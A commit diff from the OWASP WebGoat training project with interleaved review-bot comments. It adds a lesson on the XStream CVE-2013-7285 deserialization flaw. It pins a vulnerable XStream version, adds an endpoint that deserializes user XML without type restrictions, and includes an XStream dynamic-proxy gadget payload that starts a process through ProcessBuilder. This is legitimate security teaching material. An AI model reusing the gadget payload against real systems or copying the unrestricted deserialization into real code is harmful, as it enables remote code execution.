Xstream RCE works now

mayhew64 2017-02-07 23:51:05 -05:00
parent 65d728dfff
commit 33e807797c
10 changed files with 161 additions and 40 deletions


@ -260,6 +260,12 @@
<version>0.4.10</version> <version>0.4.10</version>
</dependency> </dependency>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
<version>1.4.6</version>
</dependency>
<!-- ************* END spring MVC and related dependencies ************** --> <!-- ************* END spring MVC and related dependencies ************** -->
<!-- ************* START: Dependencies for Unit and Integration Testing ************** --> <!-- ************* START: Dependencies for Unit and Integration Testing ************** -->
<dependency> <dependency>
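Review bot: The xstream 1.4.6 dependency is being added precisely because that version is exploitable (the lesson text in this commit points at CVE-2013-7285), but nothing in the pom records that, so a dependency scanner will flag it and an upgrade bot will bump it and silently break the lesson. I would add a comment next to the version line: `<!-- intentionally vulnerable version for the Vulnerable Components lesson (CVE-2013-7285); do not upgrade -->`. If the build runs a dependency-check plugin, an explicit suppression entry for this artifact is the right place to document the exception as well.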


@ -0,0 +1,22 @@
package org.owasp.webgoat.plugin;
import com.thoughtworks.xstream.converters.Converter;
import com.thoughtworks.xstream.converters.MarshallingContext;
import com.thoughtworks.xstream.converters.UnmarshallingContext;
import com.thoughtworks.xstream.io.HierarchicalStreamReader;
import com.thoughtworks.xstream.io.HierarchicalStreamWriter;
public class CatchAllConverter implements Converter {
public boolean canConvert(Class clazz) {
return true;
}
public void marshal(Object value, HierarchicalStreamWriter writer, MarshallingContext context) {
}
public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
return null;
}
}
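Review bot: `unmarshal` returns null for every type, so if this converter is ever registered as the very-low-priority fallback (the registration in the lesson endpoint is currently commented out) any type no other converter claims is silently turned into null instead of being rejected, which appears to be what the new `Trying to deserialize null object` feedback is compensating for. If the intent is a deny-by-default guard, failing loudly is clearer: `throw new com.thoughtworks.xstream.converters.ConversionException("type not allowed: " + reader.getNodeName());`. The three methods should carry `@Override` so the compiler checks them against the `Converter` interface, and a class-level comment stating whether this is a guard or just scaffolding for the lesson would help the next reader.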


@ -0,0 +1,18 @@
package org.owasp.webgoat.plugin;
import com.thoughtworks.xstream.annotations.XStreamAlias;
@XStreamAlias("contact")
public class Contact {
@XStreamAlias("name")
String name;
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
}
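Review bot: `Contact` has no `toString()`, and the lesson endpoint in this same commit reports the non-exploit case via `feedbackArgs(expl.toString())`, so the user will see something like `org.owasp.webgoat.plugin.Contact@1b2c3d` rather than the contact they created. Adding `@Override public String toString() { return "Contact{name='" + name + "'}"; }` fixes that message. Separately, the lesson page introduced here shows a contact with id, firstName, lastName and email elements, while this class only declares `name`; with XStream's default reflection converter I would expect those elements to be rejected as unknown fields, so either the example XML or this class needs to be aligned. Since accessors exist, `name` should also be `private`.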


@ -0,0 +1,30 @@
package org.owasp.webgoat.plugin;
import com.thoughtworks.xstream.converters.Converter;
import com.thoughtworks.xstream.converters.MarshallingContext;
import com.thoughtworks.xstream.converters.UnmarshallingContext;
import com.thoughtworks.xstream.io.HierarchicalStreamReader;
import com.thoughtworks.xstream.io.HierarchicalStreamWriter;
public class ContactConverter implements Converter {
public boolean canConvert(Class clazz) {
return clazz.equals(Contact.class);
}
public void marshal(Object value, HierarchicalStreamWriter writer, MarshallingContext context) {
Contact contact = (Contact) value;
writer.startNode("name");
writer.setValue(contact.getName());
writer.endNode();
}
public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
Contact contact = new Contact();
reader.moveDown();
contact.setName(reader.getValue());
reader.moveUp();
return contact;
}
}
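Review bot: `unmarshal` calls `reader.moveDown()` unconditionally and takes whatever the first child element is as the name, so an empty `<contact/>` fails inside the reader instead of yielding an empty contact, and `<contact><email>x</email></contact>` produces a contact named `x`. The converter is not registered yet (the call in the lesson is commented out), but as written it should walk the children and read only the element it expects. `marshal` likewise passes `contact.getName()` straight to `setValue`, which I would expect to fail for a null name; a null guard there is a one-liner. `@Override` belongs on the three interface methods.
```java
    public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
        Contact contact = new Contact();
        // Only honour the element this converter knows about; ignore anything else.
        while (reader.hasMoreChildren()) {
            reader.moveDown();
            if ("name".equals(reader.getNodeName())) {
                contact.setName(reader.getValue());
            }
            reader.moveUp();
        }
        return contact;
    }
```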


@ -1,6 +1,7 @@
package org.owasp.webgoat.plugin; package org.owasp.webgoat.plugin;
import com.thoughtworks.xstream.XStream; import java.io.IOException;
import org.owasp.webgoat.assignments.AssignmentEndpoint; import org.owasp.webgoat.assignments.AssignmentEndpoint;
import org.owasp.webgoat.assignments.AssignmentPath; import org.owasp.webgoat.assignments.AssignmentPath;
import org.owasp.webgoat.assignments.AttackResult; import org.owasp.webgoat.assignments.AttackResult;
@ -9,7 +10,8 @@ import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RequestParam; import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody; import org.springframework.web.bind.annotation.ResponseBody;
import java.io.IOException; import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.xml.DomDriver;
/** /**
* ************************************************************************************************* * *************************************************************************************************
@ -50,34 +52,50 @@ public class VulnerableComponentsLesson extends AssignmentEndpoint {
@RequestMapping(method = RequestMethod.POST) @RequestMapping(method = RequestMethod.POST)
public @ResponseBody AttackResult completed(@RequestParam String payload) throws IOException { public @ResponseBody AttackResult completed(@RequestParam String payload) throws IOException {
String process = "open";
String arguments = "/Applications/Calculator.app";
String payload2 = "<sorted-set>" +
"<string>foo</string>" + XStream xstream = new XStream(new DomDriver());
"<dynamic-proxy>" + // xstream.processAnnotations(Contact.class);
"<interface>java.lang.Comparable</interface>" + // xstream.registerConverter(new ContactConverter());
"<handler class=\"java.beans.EventHandler\">" + // xstream.registerConverter(new CatchAllConverter(), XStream.PRIORITY_VERY_LOW);
" <target class=\"java.lang.ProcessBuilder\">" +
" <command>" + // Contact c = new Contact();
" <string>" + process + "</string>" + // c.setName("Alvaro");
" <string>" + arguments + "</string>" + // String sc = xstream.toXML(c);
" </command>" + // System.out.println(sc);
" </target>" +
" <action>start</action>" +
"</handler>" + // String payload2 = "<sorted-set>" +
"</dynamic-proxy>" + // "<string>foo</string>" +
"</sorted-set>"; // "<dynamic-proxy>" +
XStream xstream = new XStream(); // "<interface>java.lang.Comparable</interface>" +
String xml = (String)xstream.fromXML(payload2); // "<handler class=\"java.beans.EventHandler\">" +
if (!payload.toString().equals("")) { // " <target class=\"java.lang.ProcessBuilder\">" +
return trackProgress(success() // " <command>" +
.feedback("vulnerable-components") // " <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>" +
.feedbackArgs(xml) // " </command>" +
.build()); // " </target>" +
} else { // " <action>start</action>" +
// "</handler>" +
// "</dynamic-proxy>" +
// "</sorted-set>";
try {
// System.out.println("Payload:" + payload);
Contact expl = (Contact) xstream.fromXML(payload);
return trackProgress(success().feedback("vulnerable-components.fromXML").feedbackArgs(expl.toString()).build());
} catch (com.thoughtworks.xstream.converters.ConversionException ex) {
ex.printStackTrace();
if (ex.getMessage().contains("Integer"))
{
return trackProgress(success().feedback("vulnerable-components.success").build());
}
return trackProgress(failed().feedback("vulnerable-components.close").build()); return trackProgress(failed().feedback("vulnerable-components.close").build());
}
}
} }
} }
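Review bot: `(Contact) xstream.fromXML(payload)` casts before anything checks the type, and only `ConversionException` is caught, so a payload that deserializes cleanly to something other than a Contact (for example `<string>x</string>` or `<int>1</int>`) throws a `ClassCastException` out of the handler and the user gets a server error instead of lesson feedback. Detecting the exploit via `ex.getMessage().contains("Integer")` is also fragile: it throws if `getMessage()` is ever null and depends on the wording of the cast failure inside the proxy handler, so at minimum wrap it as `String.valueOf(ex.getMessage())`, and the project logger is preferable to `ex.printStackTrace()`. Leaving an unrestricted `new XStream(new DomDriver())` is obviously the point of the lesson, but a one-line comment saying so would stop a future cleanup from "fixing" it, and the large block of commented-out payload and converter-registration code should be deleted or moved into the lesson documentation. The method is complete within this hunk.
```java
    public @ResponseBody AttackResult completed(@RequestParam String payload) throws IOException {
        // No type restriction on purpose: this endpoint is the CVE-2013-7285 exercise.
        XStream xstream = new XStream(new DomDriver());
        try {
            Object parsed = xstream.fromXML(payload);
            if (!(parsed instanceof Contact)) {
                // Parsed, but neither a Contact nor the exploit: report it as a miss.
                return trackProgress(failed().feedback("vulnerable-components.close").build());
            }
            Contact expl = (Contact) parsed;
            return trackProgress(success().feedback("vulnerable-components.fromXML").feedbackArgs(expl.toString()).build());
        } catch (com.thoughtworks.xstream.converters.ConversionException ex) {
            String message = String.valueOf(ex.getMessage());
            // … unchanged: "Integer" check and success/close feedback, applied to message …
        }
    }
```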


@ -131,6 +131,12 @@
<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files, <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc --> which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
<div class="adoc-content" th:replace="doc:VulnerableComponents_content5.adoc"></div> <div class="adoc-content" th:replace="doc:VulnerableComponents_content5.adoc"></div>
</div>
<div class="lesson-page-wrapper">
<!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
<div class="adoc-content" th:replace="doc:VulnerableComponents_content5a.adoc"></div>
<div class="attack-container"> <div class="attack-container">
<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div> <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
<!-- using attack-form class on your form will allow your request to be ajaxified and stay within the display framework for webgoat --> <!-- using attack-form class on your form will allow your request to be ajaxified and stay within the display framework for webgoat -->
@ -143,8 +149,13 @@
<div id="lessonContent"> <div id="lessonContent">
<form accept-charset="UNKNOWN" method="POST" name="form" <form accept-charset="UNKNOWN" method="POST" name="form"
action="#attack/307/100" enctype=""> action="#attack/307/100" enctype="">
Enter Your XML payload: <input name="payload" value="" type="TEXT"/><input <table>
name="SUBMIT" value="Go!" type="SUBMIT"/> <tr>
<td>Enter the contact's xml representation:</td>
<td><textarea name="payload" value="" type="TEXT" rows="15" cols="60"/></td>
<td><input name="SUBMIT" value="Go!" type="SUBMIT"/></td>
</tr>
</table>
</form> </form>
</div> </div>
</form> </form>
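Review bot: The new `<textarea name="payload" value="" type="TEXT" rows="15" cols="60"/>` is self-closing, which HTML does not permit for textarea; browsers treat it as an opening tag, so the submit button and everything after it become the textarea's text content and the payload form may not submit at all. It needs an explicit close tag, and the `value`/`type` attributes are not valid on a textarea: `<textarea name="payload" rows="15" cols="60"></textarea>`. The outer form closed at the end of this hunk starts outside it.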


@ -4,18 +4,17 @@
* Is it old or is it stable * Is it old or is it stable
* Was my lack of upgrade a deliberate choice or a lack of knowledge * Was my lack of upgrade a deliberate choice or a lack of knowledge
=== What is architectural risk?
* Is my component out of date
* Is the project I'm using no longer active * Is the project I'm using no longer active
* Is my component unpopular * Is my component unpopular
=== Summary
* It's really difficult to keep components up to dat
=== Summary?
image::plugin_lessons/plugin/VulnerableComponents/images/Old-Components.png[caption="Figure: ", title="Old Components", alt="Old Components", width="355", height="304", style="lesson-image"]
For the components analyzed in 25,000 applications it was found that: For the components analyzed in 25,000 applications it was found that:
* 8% of 2 year old components did not have a newer version * 8% of 2 year old components did not have a newer version
* 23% of 11 year old components did not have a newer version * 23% of 11 year old components did not have a newer version
image::plugin_lessons/plugin/VulnerableComponents/images/Old-Components.png[caption="Figure: ", title="Old Components", alt="Old Components", width="355", height="304", style="lesson-image"]


@ -6,8 +6,8 @@ In November of 2015, the Apache Commons Collections component latest release was
Ref: http://www.pcworld.com/article/3004633/business-security/thousands-of-java-applications-vulnerable-to-nine-month-old-remote-code-execution-exploit.html[Thousands of Java applications vulnerable to nine-month-old remote code execution exploit] Ref: http://www.pcworld.com/article/3004633/business-security/thousands-of-java-applications-vulnerable-to-nine-month-old-remote-code-execution-exploit.html[Thousands of Java applications vulnerable to nine-month-old remote code execution exploit]
=== Dinis Cruz exploit of XStream === Dinis Cruz and pwntester exploit of XStream
XStream, a relatively common XML and JSON parsing library, has a nasty little remote code execution. Ref: http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html[Dinis Cruz Blog] XStream, a relatively common XML and JSON parsing library, has a nasty little remote code execution. Ref: http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html[Dinis Cruz Blog] https://github.com/pwntester/XStreamPOC[pwntester/XStreamPOC]
Let's see if you can figure out how to exploit this in WebGoat. You may want to read the article(s) before trying this lesson. Let's see if you can figure out how to exploit this in WebGoat.


@ -0,0 +1,14 @@
== Exploiting http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7285[CVE-2013-7285] (XStream)
WebGoat Sends an XML document to add contacts to a contacts database.
[source,xml]
----
<contact>
<id>1</id>
<firstName>Bruce</firstName>
<lastName>Mayhew</lastName>
<email>webgoat@owasp.org</email>
</contact>
----
For this example, we will let you enter the xml directly versus intercepting the request and modifying the data. You provide the XML representation of a contact and WebGoat will convert it a Contact object using XStream.fromXML(xml).


@ -1,3 +1,6 @@
vulnerable-components.title=Vulnerable Components vulnerable-components.title=Vulnerable Components
EnterYourName=Enter your Name EnterYourName=Enter your Name
Go!=Go! Go!=Go!
vulnerable-components.close=Trying to deserialize null object.
vulnerable-components.success=If you are not seeing the application you started; it may be minimized
vulnerable-components.fromXML=You created contact {0}. This means you did not exploit the remote code execution.